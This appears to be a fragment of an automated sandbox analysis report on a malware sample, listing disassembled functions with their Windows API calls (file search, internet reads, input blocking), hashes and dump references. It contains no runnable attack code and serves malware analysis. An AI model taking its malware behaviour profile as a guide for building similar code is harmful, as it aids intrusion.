                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _strncmp
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ACCEPT$^$h
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 909875538-4263704089
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 72a2cba82410d8b1d90f72ff5cad5771b474d57714a55a9933f2c727144888ce
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: adbbb77bd847cefbadd23aa8e42bde8f813033e7c46a43322acc698efb747d92
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE22A0746083818FE725CF29C48076BBBE2BFC9304F24896EE8D587351D779984ACB56
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00446566 Relevance: 5.9, Strings: 4, Instructions: 868COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-2165971703
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 514654dd073cfe12bfc68f6c44a091d7a3824994b709b832431b3f3de6bbd106
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fe5f619ecbbb89e409f3ebcf557090f4afc22d0cdf4dbad8df8e547bb5c0b5b7
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5562D3716087818BE734CF18C8807ABB7E1EBC6314F154A2FE49986390E779D949CB5B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045C999 Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045C9BE
                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0045CA1B
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CA4A
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3541575487-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 18858b47483a38653cd59612877c1399ad483e9f26b014a4aa46912757e3bc7b
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cd42767256c3935660832567e39f7af9e021373ba4cf75ddba00705dd7020de4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EC41CE756003009FC720EF79D880A9BB3E4FF89315F208A6EED698B391D775A844CB95
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00436ADE Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(00000001,00000000), ref: 00436AEF
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000001,?), ref: 00436B00
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00436B13
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FileFind$AttributesCloseFirst
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 48322524-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 417b6d6de692ea6945bae3bf725251b28653fd5bce93257cef0f58e2a105c1b1
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9dc85b775151a348b3ed896f2b5842869c214baa03f23a1e311506cc1954de59
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 23E02236804418678600AB7CAC0C4EE779CDB0A335F100B96FE38C21D0D775A9408FEA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443390 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __time64.LIBCMT ref: 004433A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: rJ
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2893107130-1865492326
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ebc1a5536eae3429eadb0b33e849de59894c076497330b79c1ff8485d89898ec
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e603e75d0767fd135478995c8e8d26e9f594f0c4df67822259ddb38eb763753e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B721A2336205108BF321CF36CC41652B7E7EBE0314F268A6AE4A5973C5CA797906CB98
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00443391 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • __time64.LIBCMT ref: 004433A2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414CEF: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,004341DB,00000000,?,0044248A,?,?,?,0048B850), ref: 00414CFA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00414CEF: __aulldiv.LIBCMT ref: 00414D1A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: rJ
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2893107130-1865492326
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 4b4e0c3debee0a45c2bc781276f994e79ac96c452fb6cf924f1e6ade5adf298d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8e365b2ab883cc854990c78a2143569adcb81f7322f31e235de15ec19987b7e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E82187336345108BF321CF36CC4165277E3EBE0314B258B6AD4A5973C5CA797906CB88
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044289D Relevance: 3.1, APIs: 2, Instructions: 82networkfileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetQueryDataAvailable.WININET(?,?,?,?,00000000,00000000), ref: 004428C2
                                                                                                                                                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(?,00000000,?,?), ref: 004428F9
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 901099227-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2c15810e60b1cb59304632cc8162977c32d0240baa2dcf3c2cd6ef22f942a6bb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0771251b70b9bd68c35fac6f7da5b5f16004994504cb59d35d549d3fc14a9ba4
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 452174B12043016BF220EF56DD45FAFB3E8ABD4715F40492EF285A6180D7B8E949C76A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045DD7C Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045DDA1
                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0045DDDD
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3577cc1601137e614a3334ffa73c6d258275d41fe8d72aaca367a27ef3e2a016
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eac1d012b3ae473636f11b903683455954ec17c127a785734040b224e9a5f79e
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE11E5766002049FD710EF6ADC89A5AF7E5EF84325F10892EF958D7281CB75E8048B94
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047CBF0 Relevance: 2.9, Strings: 2, Instructions: 418COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0vH$HH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-728391547
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 538a6706abcc28c04bdc151be30d2aa4e2083a8dfdfa6c30a7857f36827e6882
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96d535d6e61c6cd6e5d21badf476ce2a2faa32e114d6f0ae27a3d334794412dd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60E1BE725143109FC310EF25C881A9FB7E5AFC4708F108D2EF589AB281D779E946CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F890 Relevance: 2.1, APIs: 1, Instructions: 589COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2102423945-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fac722ae1e10b3ad9494cda40f9fb3e9e62b3c26aea04ddfc6562ea9d2065ebb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b8def19716de174921965326585c8a0a0c2eba4d3f226f62ebfac136bfb84777
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C512B4B7B983194FDB48DEE4DCC169573E1FB98304F09A43C9A15C7306F6E8AA094794
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047E1FA Relevance: 2.0, APIs: 1, Instructions: 499COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,?,?,?,004A83D8,?), ref: 0047E22C
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Proc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2346855178-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e1c03c818efbd3cbf3664a0c3e659178dbc9a05004c0f073233894ce1d713c90
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f476b527310cd4595d6f2246be334f82b87c4d4a511bc9a4ae10ad49a3a576c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4EB1E63330602429E114916BBC88EBFBB9CD7D677BB208B7FF142C1582DB5B6425A179
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045A259 Relevance: 1.5, APIs: 1, Instructions: 21keyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BlockInput
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3456056419-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
